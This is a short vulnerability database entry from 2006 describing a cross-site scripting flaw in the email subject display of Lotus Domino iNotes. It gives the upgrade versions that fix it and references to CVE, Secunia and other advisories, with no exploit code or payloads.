Lotus Domino iNotes Email Subject XSS

2006-02-10T07:02:51
ID OSVDB:23078
Type osvdb
Reporter Jakob Balle(jb@secunia.com)
Modified 2006-02-10T07:02:51

Description

Vulnerability Description

Lotus Notes contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the subject of an email upon displaying it to the user. This could allow an attacker to create a specially crafted file name that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 6.5.5, 7.0.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Lotus Notes contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the subject of an email upon displaying it to the user. This could allow an attacker to create a specially crafted file name that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

References:

Vendor Specific Advisory URL Security Tracker: 1015610 Secunia Advisory ID:16340 Related OSVDB ID: 23077 Related OSVDB ID: 23079 Other Advisory URL: http://secunia.com/secunia_research/2005-38/advisory/ Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0183.html ISS X-Force ID: 24612 FrSIRT Advisory: ADV-2006-0499 CVE-2006-0663 Bugtraq ID: 16577